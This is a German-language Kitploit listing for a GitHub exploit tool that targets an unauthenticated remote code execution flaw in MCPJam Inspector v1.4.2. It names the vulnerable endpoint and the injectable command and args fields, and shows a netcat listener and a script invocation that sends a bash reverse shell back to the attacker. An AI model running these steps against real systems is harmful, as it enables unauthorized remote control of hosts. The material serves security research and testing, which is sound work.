Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-RCE — Dieses Dienstprogramm wurde im Rahmen der Forschung zu MCPJam v1.4.2 erstellt. Die Anwendung stellt einen API-Endpunkt bereit, der ein Serverkonfigurationsobjekt akzeptiert. Unter bestimmten Bedingungen kann eine unzureichende Validierung eine unbeabsichtigte Befehlsausführung ermöglichen. | Kitploit
Tools/GitHubGitHub/alisster00/cve-2026-23744-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

Repository anzeigen
11vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dieses Dienstprogramm wurde im Rahmen der Forschung zu MCPJam v1.4.2 erstellt. Die Anwendung stellt einen API-Endpunkt bereit, der ein Serverkonfigurationsobjekt akzeptiert. Unter bestimmten Bedingungen kann eine unzureichende Validierung eine unbeabsichtigte Befehlsausführung ermöglichen.

Teilen

MCPJam Inspector v1.4.2 - RCE Exploit

Schwachstellenbeschreibung

MCPJam Inspector enthält eine nicht authentifizierte Remote Code Execution (RCE)-Schwachstelle im /api/mcp/connect-Endpunkt. Die Schwachstelle ermöglicht Angreifern, beliebige Befehle durch Senden einer schädlichen MCP-Serverkonfigurationsnutzlast auszuführen.

Der Endpunkt akzeptiert eine JSON-Nutzlast mit einem serverConfig-Objekt, das ein command- und ein args-Array enthält, die direkt auf dem System ohne ordnungsgemäße Validierung oder Bereinigung ausgeführt werden.

Betroffene Versionen

  • MCPJam Inspector v1.4.2 und wahrscheinlich frühere Versionen

Verwendung

Voraussetzungen

  • Python 3.6+
  • requests-Bibliothek: pip install requests
  • netcat oder socat für Listener

Schnellstart

Terminal 1 – Listener starten:

root@kitploit:~
nc -lvnp 4444

Terminal 2 – Exploit ausführen:

root@kitploit:~
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444

Beispiele

root@kitploit:~
# Default (port 6274, callback port 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>

# Custom MCPJam port
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>

# Custom listener port
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555

Funktionsweise

  1. Skript überprüft, ob MCPJam am Ziel erreichbar ist
  2. Erstellt eine schädliche MCP-Server-Nutzlast mit Bash-Reverse-Shell
  3. Sendet die Nutzlast an den /api/mcp/connect-Endpunkt
  4. MCPJam verarbeitet den Befehl und initiiert den Reverse-Shell-Rückruf
  5. Benutzer erhält interaktive Shell auf dem Listener

Haftungsausschluss

⚠️ HAFTUNGSAUSSCHLUSS:

Dieses Exploit wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal. Benutzer sind allein verantwortlich für:

  • Einholen der ordnungsgemäßen Autorisierung vor dem Testen von Systemen
  • Einhaltung aller geltenden Gesetze und Vorschriften
  • Alle Schäden oder rechtlichen Konsequenzen, die durch Missbrauch entstehen

Der Autor übernimmt keine Haftung für Missbrauch oder durch dieses Tool verursachte Schäden. Verwendung auf eigene Gefahr.

Technische Details

  • Anfälliger Endpunkt: /api/mcp/connect
  • Methode: POST
  • Authentifizierung: Keine erforderlich
  • Auswirkung: Nicht authentifizierte Remote Code Execution
Tool herunterladen